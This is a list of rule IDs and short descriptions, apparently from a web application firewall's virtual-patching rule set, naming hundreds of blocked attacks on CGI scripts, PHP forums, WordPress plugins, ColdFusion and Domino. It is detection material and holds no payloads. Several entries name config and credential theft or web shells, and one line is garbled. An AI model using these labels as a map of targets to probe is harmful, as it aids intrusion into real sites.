+373896::Atomicorp.com Malware Removal System: Potentially malicious javascript in RESPONSE_BODY removed
+303668:: Virtual Just In Time Patch: Adning PHP code injection attack blocked
+303669:: Virtual Just In Time Patch: Adning PHP code injection attack blocked
+303768:: Virtual Just In Time Patch: Possible Newsletter Plugin attack blocked
+303769:: Virtual Just In Time Patch: Possible Newsletter Plugin PHP objection insertion attack blocked
+310000:: Virtual Just In Time Patch: web-cgi formmail
+310001:: Virtual Just In Time Patch: pals-cgi arbitary file access attempt
+310003:: Virtual Just In Time Patch: phf access
+310004:: Virtual Just In Time Patch: tsearch arbitrary file read attempt
+310005:: Virtual Just In Time Patch: cssearch.cgi arbitrary command execution attempt
+310006:: Virtual Just In Time Patch: FormHandler.cgi directory traversal attempt attempt
+310007:: Virtual Just In Time Patch: FormHandler.cgi external site redirection attempt
+310008:: Virtual Just In Time Patch: squirrel mail spell-check arbitrary command attempt
+310009:: Virtual Just In Time Patch: squirrel mail theme arbitrary command attempt
+310010:: Virtual Just In Time Patch: directory.php arbitrary command attempt
+310011:: Virtual Just In Time Patch: phplib remote commanSelective REQUEST_URI|REQUEST_BODYd attempt
+310012:: Virtual Just In Time Patch: phplib remote command attempt
+310013:: Virtual Just In Time Patch: phpBB Highlighting Code Execution Attempt
+310017:: Virtual Just In Time Patch: dcforum.cgi directory traversal attempt
+310019:: Virtual Just In Time Patch: Fake gif file shell attack
+310021:: Virtual Just In Time Patch: alchemy http server NUL arbitrary command execution attempt
+310022:: Virtual Just In Time Patch: AltaVista Intranet search directory traversal attempt
+310023:: Virtual Just In Time Patch: hello.bat arbitrary command execution attempt
+310024:: Virtual Just In Time Patch: Home Free search.cgi directory traversal attempt
+310025:: Virtual Just In Time Patch: campus attempt
+310026:: Virtual Just In Time Patch: pfdispaly.cgi arbitrary command execution attempt
+310027:: Virtual Just In Time Patch: talkback.cgi directory traversal attempt
+310028:: Virtual Just In Time Patch: technote main.cgi file directory traversal attempt
+310029:: Virtual Just In Time Patch: technote print.cgi directory traversal attempt
+310030:: Virtual Just In Time Patch: eXtropia webstore directory traversal
+310031:: Virtual Just In Time Patch: shopping cart directory traversal
+310032:: Virtual Just In Time Patch: Allaire Pro Web Shell attempt
+310033:: Virtual Just In Time Patch: Armada Style Master Index directory traversal
+310034:: Virtual Just In Time Patch: cached_feed.cgi moreover shopping cart directory traversal
+310035:: Virtual Just In Time Patch: Talentsoft Web+ exploit attempt
+310036:: Virtual Just In Time Patch: txt2html.cgi directory traversal attempt
+310037:: Virtual Just In Time Patch: store.cgi directory traversal attempt
+310038:: Virtual Just In Time Patch: mrtg.cgi directory traversal attempt
+310039:: Virtual Just In Time Patch: CCBill whereami.cgi arbitrary command execution attempt
+310040:: Virtual Just In Time Patch: WhatsUpGold instancename overflow attempt
+310041:: Virtual Just In Time Patch: Demarc SQL injection attempt
+310043:: Virtual Just In Time Patch: htgrep attempt
+310044:: Virtual Just In Time Patch: musicat empower attempt
+310045:: Virtual Just In Time Patch: DNSTools administrator authentication bypass attempt
+310047:: Virtual Just In Time Patch: Generic PHP application RFI exploitation attempt
+310049:: Virtual Just In Time Patch: Blahz-DNS dostuff.php modify user attempt
+310050:: Virtual Just In Time Patch: PHP-Wiki cross site scripting attemptt
+310051:: Virtual Just In Time Patch: a.pl access
+310052:: Virtual Just In Time Patch: strings overflow
+310053:: Virtual Just In Time Patch: shoutbox.php directory traversal attempt
+310054:: Virtual Just In Time Patch: b2 cafelog gm-2-b2.php remote file include attempt
+310055:: Virtual Just In Time Patch: BLNews objects.inc.php4 remote file include attempt
+310056:: Virtual Just In Time Patch: ttCMS header.php remote file include attempt
+310057:: Virtual Just In Time Patch: autohtml.php directory traversal attempt
+310058:: Virtual Just In Time Patch: ttforum remote file include attempt
+310059:: Virtual Just In Time Patch: pmachine remote file include attempt
+310061:: Virtual Just In Time Patch: guestbook remote file include attempt
+310064:: DCP-Portal remote file include attempt
+310066:: Virtual Just In Time Patch: IdeaBox file include
+310067:: Virtual Just In Time Patch: Invision Board emailer.php file include
+310068:: Virtual Just In Time Patch: WebChat db_mysql.php file include
+310069:: Virtual Just In Time Patch: WebChat english.php file include
+310070:: Virtual Just In Time Patch: Typo3 translations.php file include
+310072:: Virtual Just In Time Patch: YaBB SE packages.php file include
+310073:: Virtual Just In Time Patch: newsPHP Language file include attempt
+310074:: Virtual Just In Time Patch: Pagetool pt_config.inc file include
+310075:: Virtual Just In Time Patch: Invision Board ipchat.php file include
+310077:: Virtual Just In Time Patch: PhpGedView PGV functions.php base directory manipulation attempt
+310078:: Virtual Just In Time Patch: TUTOS path disclosure attempt
+310080:: Virtual Just In Time Patch: PHPBB worm
+310081:: Virtual Just In Time Patch: Mailto domain search possible MyDoom.M,O
+310082:: Virtual Just In Time Patch: EasyDynamicPages exploit
+310083:: Virtual Just In Time Patch: Calendar XSS
+310084:: Virtual Just In Time Patch: phpMyAdmin Export.PHP File Disclosure Vulnerability
+310086:: Virtual Just In Time Patch: PHPBB worm
+310087:: Virtual Just In Time Patch: TikiWiki directory traversal
+310088:: Virtual Just In Time Patch: BitKeeper arbitrary command attempt
+310089:: Virtual Just In Time Patch: Awstats.pl probe
+310090:: Virtual Just In Time Patch: Forum remote include attempt
+310091:: Virtual Just In Time Patch: Crystal Reports crystalImageHandler.aspx directory traversal attempt
+310092:: Virtual Just In Time Patch: mailman 2.x path recursion attack
+310093:: Virtual Just In Time Patch: ftp.pl directory traversal attempt
+310094:: Virtual Just In Time Patch: Tomcat server snoop access
+310097:: Virtual Just In Time Patch: /wwwboard/passwd.txt access
+310098:: Virtual Just In Time Patch: Possible WYSIJA exploit attempt
+310099:: Virtual Just In Time Patch: websendmail access
+310100:: Virtual Just In Time Patch: anaconda directory transversal attempt
+310101:: imagemap.exe overflow attempt
+310103:: Virtual Just In Time Patch: nph-test-cgi access
+310104:: Virtual Just In Time Patch: rwwwshell.pl access
+310106:: Virtual Just In Time Patch: calendar_admin.pl arbitrary command execution attempt
+310107:: Virtual Just In Time Patch: bb-hist.sh directory traversal attempt
+310108:: Virtual Just In Time Patch: bb-hostscv.sh attempt
+310109:: Virtual Just In Time Patch:  wayboard attempt
+310110:: Virtual Just In Time Patch: commerce.cgi arbitrary file access attempt
+310111:: Virtual Just In Time Patch: Amaya templates sendtemp.pl directory traversal attempt
+310112:: Virtual Just In Time Patch: webspirs.cgi directory traversal attempt
+310113:: Virtual Just In Time Patch: auktion.cgi directory traversal attempt
+310114:: Virtual Just In Time Patch: cgiforum.pl attempt
+310115:: Virtual Just In Time Patch: directorypro.cgi attempt
+310116:: Virtual Just In Time Patch: Web Shopper shopper.cgi attempt
+310117:: Virtual Just In Time Patch: cal_make.pl directory traversal attempt
+310118:: Virtual Just In Time Patch: ttawebtop.cgi arbitrary file attempt
+310119:: Virtual Just In Time Patch: ustorekeeper.pl directory traversal attempt
+310120:: Virtual Just In Time Patch:  htsearch arbitrary configuration file attempt
+310121:: Virtual Just In Time Patch: alibaba.pl arbitrary command execution attempt
+310122:: Virtual Just In Time Patch: AltaVista Intranet search directory traversal attempt
+310123:: Virtual Just In Time Patch: test.bat arbitrary command execution attempt
+310124:: Virtual Just In Time Patch: input.bat arbitrary command execution attempt
+310125:: Virtual Just In Time Patch: envout.bat arbitrary command execution attempt
+310126:: Virtual Just In Time Patch: hello.bat arbitrary command execution attempt
+310127:: Virtual Just In Time Patch:  cssearch.cgi arbitrary command execution attempt
+310128:: Virtual Just In Time Patch:  eshop.pl arbitrary command execution attempt
+310129:: Virtual Just In Time Patch:  loadpage.cgi directory traversal attempt
+310130:: Virtual Just In Time Patch: faqmanager.cgi arbitrary file attempt
+310131:: Virtual Just In Time Patch:  Home Free search.cgi directory traversal attempt
+310132:: Virtual Just In Time Patch:  pfdisplay.cgi arbitrary command execution attempt
+310133:: Virtual Just In Time Patch:  pagelog.cgi directory traversal attempt
+310134:: Virtual Just In Time Patch:  pagelog.cgi directory traversal attempt
+310135:: Virtual Just In Time Patch:  emumail.cgi NULL attempt
+310136:: Virtual Just In Time Patch:  technote main.cgi directory traversal attempt
+310137:: Virtual Just In Time Patch:  technote print.cgi directory traversal attempt
+310138:: Virtual Just In Time Patch:  Allaire Pro authenticate.cgi shell attempt
+310139:: Virtual Just In Time Patch:  Armada Style Master search.cgi directory traversal attempt
+310140:: Virtual Just In Time Patch:  Moreover cached_feed.cgi directory traversal attempt
+310141:: Virtual Just In Time Patch:  Talentsoft Web+ exploit attempt
+310142:: Virtual Just In Time Patch:  Bizdbsearch bizdb1-search.cgi mail attempt
+310143:: Virtual Just In Time Patch:  sojourn.cgi file access attempt
+310144:: Virtual Just In Time Patch:  infosrch.cgi fname attempt
+310145:: Virtual Just In Time Patch:  store.cgi directory traversal attempt
+310146:: Virtual Just In Time Patch:  generate.cgi file access attempt
+310147:: Virtual Just In Time Patch:  story.pl file access attempt
+310148:: Virtual Just In Time Patch:  mrtg.cgi directory traversal attempt
+310150:: Virtual Just In Time Patch:  CCbill whereami.cgi command execution attempt
+310151:: Virtual Just In Time Patch:  MDaemon form2raw.cgi overflow attempt
+310152:: Virtual Just In Time Patch:  WhatsUpGold _maincfgret.cgi overflow attempt
+310154:: Virtual Just In Time Patch:  Coldfusion cfcache.map file access attempt
+310155:: Virtual Just In Time Patch:  Coldfusion exampleapp e-mail application.cfm access attempt
+310156:: Virtual Just In Time Patch:  Coldfusion exampleapp publisher application.cfm access attempt
+310157:: Virtual Just In Time Patch:  Coldfusion exampleapp e-mail getfile.cfm access attempt
+310158:: Virtual Just In Time Patch:  Coldfusion exampleapp addcontent.cfm access attempt
+310160:: Virtual Just In Time Patch:  Coldfusion fileexists.cfm access attempt
+310161:: Virtual Just In Time Patch:  Coldfusion expercalc.cfm access attempt
+310162:: Virtual Just In Time Patch:  Coldfusion parks detail.cfm access attempt
+310163:: Virtual Just In Time Patch:  Coldfusion cfappman index.cfm access attempt
+310164:: Virtual Just In Time Patch:  Coldfusion beaninfo.cfm access attempt
+310165:: Virtual Just In Time Patch:  Coldfusion evaluate.cfm access attempt
+310166:: Virtual Just In Time Patch:  Coldfusion expeval access attempt
+310167:: Virtual Just In Time Patch:  Coldfusion displayfile access attempt
+310168:: Virtual Just In Time Patch:  Coldfusion mainframeset.cfm access attempt
+310171:: Virtual Just In Time Patch:  Coldfusion cfmlsyntaxcheck.cfm access attempt
+310172:: Virtual Just In Time Patch:  Coldfusion application.cfm direct access attempt
+310173:: Virtual Just In Time Patch:  Coldfusion onrequestend.cfm direct access attempt
+310174:: Virtual Just In Time Patch:  Coldfusion startstop.cfm DoS attempt
+310175:: Virtual Just In Time Patch:  Coldfusion gettempdirectory.cfm direct access attempt
+310176:: Virtual Just In Time Patch:  Coldfusion sendmail.cfm direct access attempt
+310177:: Virtual Just In Time Patch:  Coldfusion debug mode access attempt
+310179:: Virtual Just In Time Patch:  Unify eWave UploadServlet abuse attempt
+310180:: Virtual Just In Time Patch:  Talentsoft Web+ source code access attempt
+310181:: Virtual Just In Time Patch:  Talentsoft Web+ source code access attempt
+310183:: Virtual Just In Time Patch:  tomcat contextAdmin exploit attempt
+310184:: Virtual Just In Time Patch:  eCommerce import.txt access attempt
+310185:: Virtual Just In Time Patch:  Domino catalog.nsf access attempt
+310186:: Virtual Just In Time Patch:  Domino domcfg.nsf access attempt
+310187:: Virtual Just In Time Patch:  Domino domlog.nsf access attempt
+310188:: Virtual Just In Time Patch:  Domino log.nsf access attempt
+310189:: Virtual Just In Time Patch:  Domino names.nsf access attempt
+310190:: Virtual Just In Time Patch:  Domino mab.nsf access attempt
+310191:: Virtual Just In Time Patch:  Domino cersvr.nsf access attempt
+310192:: Virtual Just In Time Patch:  Domino setup.nsf access attempt
+310193:: Virtual Just In Time Patch:  Domino statrep.nsf access attempt
+310194:: Virtual Just In Time Patch:  Domino webadmin.nsf access attempt
+310195:: Virtual Just In Time Patch:  Domino events4.nsf access attempt
+310196:: Virtual Just In Time Patch:  Domino ntsync4.nsf access attempt
+310197:: Virtual Just In Time Patch:  Domino collect4.nsf access attempt
+310198:: Virtual Just In Time Patch:  Domino mailw46.nsf access attempt
+310199:: Virtual Just In Time Patch:  Domino bookmark.nsf access attempt
+310200:: Virtual Just In Time Patch:  Domino agentrunner.nsf access attempt
+310202:: Virtual Just In Time Patch:  Ecommerce checks.txt access attempt
+310203:: Virtual Just In Time Patch:  Mall Log order access attempt
+310204:: Virtual Just In Time Patch:  roads search.pl access attempt
+310205:: Virtual Just In Time Patch:  SWEditServlet directory traversal attempt
+310206:: Virtual Just In Time Patch:  RBS ISP /newuser directory traversal attempt
+310207:: Virtual Just In Time Patch:  PCCS MySQL database admin tool access attempt
+310208:: Virtual Just In Time Patch:  ans.pl file access attempt
+310209:: Virtual Just In Time Patch:  Demarc SQL injection attempt
+310210:: Virtual Just In Time Patch:  philboard_admin.asp authentication bypass attempt
+310211:: Virtual Just In Time Patch:  Phorum common.php direct access attempt
+310212:: Virtual Just In Time Patch:  Rolis guestbook insert.inc.php remote file inclusion attempt
+310217:: Virtual Just In Time Patch: : Invision Board ipchat.php file inclusion attempt
+310218:: Virtual Just In Time Patch: : myphpPagetool pt_config.inc file inclusion attempt
+310219:: Virtual Just In Time Patch: : YaBB SE packages.php file inclusion attempt
+310224:: Virtual Just In Time Patch: : WAnewsletter newsletter.php file inclusion attempt
+310225:: Virtual Just In Time Patch: : Opt-X header.php remote file inclusion attempt
+310226:: Virtual Just In Time Patch: Microsoft Frontpage exploit attempt
+310227:: Virtual Just In Time Patch: auth.php remote file inclusion attempt
+310228:: Virtual Just In Time Patch: Dforum nav.php3 executable code injection attempt
+310229:: Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php file inclusion attempt
+310231:: Virtual Just In Time Patch: PHPBB oracle.php full path disclosure attempt
+310233:: Virtual Just In Time Patch: PHP formmail.inc.php file inclusion attempt
+310234:: Virtual Just In Time Patch: download Center Lite download_center_lite.inc.php command execution attempt
+310235:: Virtual Just In Time Patch: mod_mainmenu.php command execution attempt
+310236:: Virtual Just In Time Patch: phpWebLog init.inc.php command execution attempt
+310237:: Virtual Just In Time Patch: phpWebLog backend index.php command execution attempt
+310238:: Virtual Just In Time Patch: mcNews header.php command execution attempt
+310239:: Virtual Just In Time Patch: phpBB admin_styles.php directory traversal attempt
+310240:: Virtual Just In Time Patch: votebox.php command execution attempt
+310241:: Virtual Just In Time Patch: phpAdsNew lib-xmlrpcs.inc.php path disclosure attempt
+310242:: Virtual Just In Time Patch: phpAdsNew maintenance-activation.php path disclosure attempt
+310243:: Virtual Just In Time Patch: phpAdsNew maintenance-cleantables.php path disclosure attempt
+310244:: Virtual Just In Time Patch: phpAdsNew maintenance-autotargeting.php path disclosure attempt
+310245:: Virtual Just In Time Patch: phpAdsNew maintenance-reports.php path disclosure attempt
+310246:: Virtual Just In Time Patch: phpAdsNew backwards compatibility phpads.php path disclosure attempt
+310247:: Virtual Just In Time Patch: phpAdsNew backwards compatibility remotehtmlview.php path disclosure attempt
+310248:: Virtual Just In Time Patch: phpAdsNew backwards compatibility click.php path disclosure attempt
+310250:: Virtual Just In Time Patch: includer.cgi command execution attempt
+310251:: Virtual Just In Time Patch: citrusdb tools/index.php directory traversal attempt
+310252:: Virtual Just In Time Patch: citrusdb tools/index.php upload authorization bypass attempt
+310253:: Virtual Just In Time Patch: citrusdb tools/uploadcc.php credit card data upload attempt
+310254:: Virtual Just In Time Patch: awstats.pl command execution attempt
+310255:: Virtual Just In Time Patch: awstats.pl local file access attempt
+310256:: Virtual Just In Time Patch: awstats.pl local file access attempt
+310257:: Virtual Just In Time Patch: awstats.pl directory traversal attempt
+310259:: Virtual Just In Time Patch: awstats local file system access monkey business attempt
+310262:: Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt
+310263:: Virtual Just In Time Patch: phpBB posting.php cross-site-scripting attempt
+310264:: Virtual Just In Time Patch: phpBB privmsg.php cross-site-scripting attempt
+310265:: Virtual Just In Time Patch: Proxy Grabber nph-env.cgi access attempt
+310266:: Virtual Just In Time Patch: mail_autocheck.php cross-site-scripting attempt
+310267:: Virtual Just In Time Patch: phpWebLog init.inc.php remote file inclusion attempt
+310268:: Virtual Just In Time Patch: phpWebLog links/index.php remote file inclusion attempt
+310269:: Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt
+310270:: Virtual Just In Time Patch: ProjectBB divers.php cross-site-scripting attempt
+310271:: Virtual Just In Time Patch: ProjectBB Zip/divers.php SQL injection attempt
+310272:: Virtual Just In Time Patch: WebChat defines.php local file inclusion attempt
+310273:: Virtual Just In Time Patch: D-Forum nav.php3 cross-site-scripting attempt
+310274:: Virtual Just In Time Patch: auraCMA index.php cross-site-scripting attempt
+310275:: Virtual Just In Time Patch: auraCMA hits.php cross-site-scripting attempt
+310276:: Virtual Just In Time Patch: auraCMA counter.php cross-site-scripting attempt
+310277:: Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt
+310278:: Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt
+310279:: Virtual Just In Time Patch: vBulletin forumdisplay.php local command execution attempt
+310280:: Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt
+310281:: Virtual Just In Time Patch: PHPnuke modules.php cross-site-scripting attempt
+310282:: Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt
+310283:: Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt
+310284:: Virtual Just In Time Patch: EasyDynamicPages edp_relative_path exploitation attempt
+310285:: Virtual Just In Time Patch: readfile.tcl local file access attempt
+310287:: Virtual Just In Time Patch: WAnewsletter newsletter.php local file inclusion attempt
+310288:: Virtual Just In Time Patch: Typo3 translations.php local file inclusion attempt
+310289:: Virtual Just In Time Patch: PHPnuke index.php remote file inclusion attempt
+310293:: Virtual Just In Time Patch: poc_root_path remote file inclusion attempt
+310295:: Virtual Just In Time Patch: PHPOpenChat poc.php remote file inclusion attempt
+310296:: Virtual Just In Time Patch: ACS Blog search.asp cross-site-scripting attempt
+310297:: Virtual Just In Time Patch: mcNews install.php remote command execution attempt
+310298:: Virtual Just In Time Patch: Mailman cross-site-scripting attempt
+310299:: Virtual Just In Time Patch: Macromedia SiteSpring 500error.jsp cross-site-scripting attempt
+310300:: Virtual Just In Time Patch: Outlook Web Access owalogon.asp phishing redirect attempt
+310301:: Virtual Just In Time Patch: ads.cgi local command execution attempt
+310305:: Virtual Just In Time Patch: b2-include local command execution attempt
+310306:: Virtual Just In Time Patch: b2-include local command execution attempt
+310307:: Virtual Just In Time Patch: RUNCMS.Exoops.CIAMOS highlight.php file access attempt
+310308:: Virtual Just In Time Patch: TRG/CzarNews /install/* local command execution attempt
+310313:: Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt
+310314:: Virtual Just In Time Patch: PhotoPost showgallery.php cross-site-scripting attempt
+310318:: Virtual Just In Time Patch: Betaparticle Blog dbBlogMX.mdb database access attempt
+310319:: Virtual Just In Time Patch: Betaparticle Blog Blog.mdb database access attempt
+310324:: Virtual Just In Time Patch: phpSysInfo index.php cross-site-scripting attempt
+310329:: Virtual Just In Time Patch: phpBB Topic Calendar calendar_scheduler.php cross-site-scripting attempt
+310334:: Virtual Just In Time Patch: Interspire ArticleLive newcomment.php cross-site-scripting attempt
+310335:: Virtual Just In Time Patch: Dream4 Koobi CMS index.php SQL injection attempt
+310337:: Virtual Just In Time Patch: Dream4 Koobi CMS index.php remote file inclusion attempt
+310338:: Virtual Just In Time Patch: Dream4 Koobi CMS content.php remote file inclusion attempt
+310340:: Virtual Just In Time Patch: ESMI Paypal Storefront pages.php SQL injection attempt
+310345:: Virtual Just In Time Patch: TikiWiki tiki-list_faqs.php cross-site-scripting attempt
+310346:: Virtual Just In Time Patch: eXoops index.php SQL injection attempt
+310347:: Virtual Just In Time Patch: eXoops sections/index.php cross-site-scripting attempt
+310349:: Virtual Just In Time Patch: eXoops index.php cross-site-scripting attempt
+310353:: Virtual Just In Time Patch: OSCommerce default.php cross-site-scripting attempt
+310354:: Virtual Just In Time Patch: Type3 translations.php remote file retrieval attempt
+310355:: Virtual Just In Time Patch: Mambo email(article,faq,news).php cross-site-scripting attempt
+310357:: Virtual Just In Time Patch: Photopost cross-site-scripting attempt
+310366:: Virtual Just In Time Patch: PHPcoin auxpage.php directory traversal attempt
+310367:: Virtual Just In Time Patch: PortalAPP ad_click.asp SQL injection attempt
+310368:: Virtual Just In Time Patch: PortalAPP content.asp SQL injection attempt
+310370:: Virtual Just In Time Patch: PortalAPP content.asp cross-site-scripting attempt
+310372:: Virtual Just In Time Patch: Lighthouse Squirrelcart index.php SQL injection attempt
+310378:: Virtual Just In Time Patch: PaFiledb pafiledb.php SQL injection attempt
+310379:: Virtual Just In Time Patch: PaFiledb pafiledb.php cross-site-scripting attempt
+310381:: Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt
+310382:: Virtual Just In Time Patch: InterAKT MX Kart index.php SQL injection attempt
+310383:: Virtual Just In Time Patch: InterAKT MX Kart mxshop SQL injection attempt
+310388:: Virtual Just In Time Patch: CPG Dragonfly Coppermine cross-site-scripting attempt
+310390:: Virtual Just In Time Patch: AlstraSoft EPay Pro epal cross-site-scripting attempt
+310392:: Virtual Just In Time Patch: AlstraSoft EPay Pro epal/index.php remote file inclusion attempt
+310405:: Virtual Just In Time Patch: phpMyAdmin index.php convcharset parameter cross-site-scripting attempt
+310407:: Virtual Just In Time Patch: Cubecart index.php SQL injection attempt
+310408:: Virtual Just In Time Patch: Cubecart tellafriend.php SQL injection attempt
+310409:: Virtual Just In Time Patch: Cubecart view_cart.php SQL injection attempt
+310410:: Virtual Just In Time Patch: Cubecart view_product.php SQL injection attempt
+310411:: Virtual Just In Time Patch: phpBB links.php SQL injection attempt
+310412:: Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt
+310413:: Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt
+310414:: Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt
+310416:: Virtual Just In Time Patch: phpBB dlman.php SQL injection attempt
+310417:: Virtual Just In Time Patch: ModernBill news.php file inclusion attempt
+310419:: Virtual Just In Time Patch: TowerBlog! _dat/login password hash disclosure attempt
+310425:: Virtual Just In Time Patch: phpBB index.php SQL injection attempt
+310426:: Virtual Just In Time Patch: phpBB portal.php SQL injection attempt
+310437:: Virtual Just In Time Patch: All4WWW Homepage Creator index.php remote file inclusion attempt
+310440:: Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php local file access attempt
+310441:: Virtual Just In Time Patch: PHP Nuke modules.php SQL injection attempt
+310442:: Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt
+310443:: Virtual Just In Time Patch: Nukebookmarks modules.php SQL injection attempt
+310444:: Virtual Just In Time Patch: e107 news.php SQL injection attempt
+310445:: Virtual Just In Time Patch: Squirrelcart index.php SQL injection attempt
+310450:: Virtual Just In Time Patch: phpBB mod.php SQL injection attempt
+310458:: Virtual Just In Time Patch: Coppermine theme.php remote file inclusion attempt
+310462:: Virtual Just In Time Patch: Kalis Tagboard banned.php local command execution attempt
+310465:: Virtual Just In Time Patch: netref cat_for_gen.php local file creation attempt
+310466:: Virtual Just In Time Patch: eGroupWare index.php SQL injection attempt
+310467:: Virtual Just In Time Patch: eGroupWare tts/index.php SQL injection attempt
+310475:: Virtual Just In Time Patch: MetaBid item.asp SQL injection attempt
+310476:: Virtual Just In Time Patch: Tikiwiki tiki-print.php cross-site-scripting attempt
+310477:: Virtual Just In Time Patch: phpBB notes module posting_notes.php SQL injection attempt
+310480:: Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt
+310481:: Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt
+310482:: Virtual Just In Time Patch: ideabox remote include attempt
+310483:: Virtual Just In Time Patch: 12Planet Chat Server Path Disclosure
+310484:: Virtual Just In Time Patch: Agora CGI Cross Site Scripting
+310485:: Virtual Just In Time Patch: Apache Remote Command Execution via .bat files
+310486:: Virtual Just In Time Patch: cpanel remote command execution
+310487:: Virtual Just In Time Patch: Oracle 9iAS mod_plsql directory traversal
+310488:: Virtual Just In Time Patch: Zeus Admin Interface XSS
+310489:: Virtual Just In Time Patch: Oracle 9iAS iSQLplus XSS
+310491:: Virtual Just In Time Patch: TorrentTrader SQL Injection
+310492:: Virtual Just In Time Patch: PHPmyGallery confdir File Inclusion Vulnerability
+310493:: Virtual Just In Time Patch: Kayako LiveResponse SQL injection
+310498:: Virtual Just In Time Patch: Formmail probe
+310499:: Virtual Just In Time Patch: JGS-Portal id Variable SQL Injection Vulnerability
+310529:: Virtual Just In Time Patch: /iiswebagentif.dll exploit attempt
+310557:: Virtual Just In Time Patch: ActiveCampaign SupportTrio Inclusion Vulnerability
+310580:: Virtual Just In Time Patch: Page argument RFI injection attempt
+310592:: Virtual Just In Time Patch: OpenCA HTML Injection
+310593:: Virtual Just In Time Patch: pdesk directory traversal and file theft
+310594:: Virtual Just In Time Patch: netquery 3.1 Remote Command Execution vuln
+310709:: Virtual Just In Time Patch: /fsms/fsmsh.dll exploit attempt
+310710:: Virtual Just In Time Patch: /msadc/msadcs.dll exploit attempt
+310711:: Virtual Just In Time Patch: /isapi/tstisapi.dll exploit attempt
+310712:: Virtual Just In Time Patch: /webadmin.dll exploit attempt
+310713:: Virtual Just In Time Patch: Java App Server SOAP config theft attempt
+310714:: Virtual Just In Time Patch: Java App Server SOAP config theft attempt
+310715:: Virtual Just In Time Patch: Possible Dreamweaver Information Disclosure
+310728:: Virtual Just In Time Patch: /pbserver/pbserver.dll exploit attempt
+310729:: Virtual Just In Time Patch: Oracle SQL config theft attempt
+310836:: Virtual Just In Time Patch: Allaire JRun sample scripts access attempt
+311098:: Virtual Just In Time Patch: Possible Revslider exploit attempt
+311235:: Virtual Just In Time Patch: localjob.php Remote Code Execution attack blocked
+311291:: Virtual Just In Time Patch: 1 Flash Gallery Wordpress Plugin File Upload Exploit
+311292:: Virtual Just In Time Patch: abspath RFI Exploit
+311293:: Virtual Just In Time Patch: PhpMyAdmin setup.php RFI Exploit
+311294:: Virtual Just In Time Patch: TestLink Open Source Test Management(&lt;= 1.9.16) Remote Code Execution attack blocked
+311295:: Virtual Just In Time Patch: cross site scripting attack blocked
+311299:: Virtual Just In Time Patch: Secure Contact Administrators data leak block 
+312019:: Virtual Just In Time Patch: alchemy http server prn arbitrary command execution attempt
+312119:: Virtual Just In Time Patch: phpSecurePages cfgProgdir File Inclusion Vulnerability
+312310:: Virtual Just In Time Patch: SQL error log access attempt
+312318:: Virtual Just In Time Patch: PHP file manager database access attempt
+312608:: Virtual Just In Time Patch: board.cgi command injection blocked
+312657:: Virtual Just In Time Patch: kerbynet command injection blocked
+312658:: Virtual Just In Time Patch: Cisco tmunblock.cgi command injection blocked
+312659:: Virtual Just In Time Patch: weblogin.cgi command injection blocked
+312668:: Virtual Just In Time Patch: setup.cgi command injection blocked
+312863:: Potential Reflected File Download (RFD) Attack.
+313098:: Virtual Just In Time Patch: webplus directory traversal
+313979:: ActiveCampaign KnowledgeBuilder SQL Injection
+314001:: Virtual Just In Time Patch: downloadProtect file Disclosure of Sensitive Information Inclusion Vulnerability
+314293:: Virtual Just In Time Patch: Possible Proxy Probe
+317091:: Virtual Just In Time Patch: search XSS attempt
+317092:: Virtual Just In Time Patch: Exchange server zero day blocked
+319000:: Virtual Just In Time Patch: Attack Tool probe
+319001:: Virtual Just In Time Patch: EkinBoard 1.0.3 config.php SQL Injection through cookie
+319003:: Virtual Just In Time Patch: cutenews shell injection vuln
+320001:: Virtual Just In Time Patch:  Detail.php id SQL injection
+320013:: Virtual Just In Time Patch: Java XSS vulnerability
+320113:: Virtual Just In Time Patch: SaphpLesson forumid SQL Injection Vulnerability
+320757:: Virtual Just In Time Patch: ZenCart Sql Injection Exploit
+321356:: Virtual Just In Time Patch: Joomla probe
+321357:: Virtual Just In Time Patch: WordPress serialize name change attack
+322100:: Virtual Just In Time Patch: admin-mail-info.php XSS attack (CVE-2016-1000146)
+322101:: Virtual Just In Time Patch: ultimate-instagram-feed.php XSS attack (CVE-2017-16758)
+322102:: Virtual Just In Time Patch: SQL Injection attack against WP Good Layers Plugin (CVE-2020-27481)
+322111:: Virtual Just In Time Patch: WordPress Load More SQL injection attack
+322112:: Virtual Just In Time Patch: Elementor Pro File Upload attack attack
+322113:: Virtual Just In Time Patch: Drag and Drop Upload Contact Form Code Injection attack
+322114:: Virtual Just In Time Patch: WP Widget Importer/Export RFI attack
+322115:: Virtual Just In Time Patch: MapPress Maps path recursion attack
+322121:: Virtual Just In Time Patch: WP Live Chat File Upload attack
+322122:: Virtual Just In Time Patch: WP Medoa Recursion attack
+322172:: Virtual Just In Time Patch: WordPress Download Manager XSS attack (CVE-2013-7319)
+322182:: Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack
+322183:: Virtual Just In Time Patch: WooCommerce Unauthenticated Arbitrary File Upload attack
+322192:: Virtual Just In Time Patch: WordPress nexos theme XSS attack (CVE 2020-15364)
+322193:: Virtual Just In Time Patch: WordPress Woocommerce SQLi blocked
+322194:: Virtual Just In Time Patch: Drupal remote command execution blocked
+322211:: Virtual Just In Time Patch: WP myEasybackup directory recursion attack 
+322222:: Virtual Just In Time Patch: WP CommentLuv XSS attack blocked
+322272:: Virtual Just In Time Patch: cmdownload XSS attack (CVE-2020-27344)
+322313:: Virtual Just In Time Patch: WP recall products plugin XSS attack (CVE-2020-25380)
+322314:: Virtual Just In Time Patch: WP AccessPress Themes attack (CVE-2020-25378)
+323667:: Virtual Just In Time Patch: WP XSS in Loginizer attack (CVE-2018-11366)
+323769:: Virtual Just In Time Patch: wp-config file download attack via duplicator plugin blocked
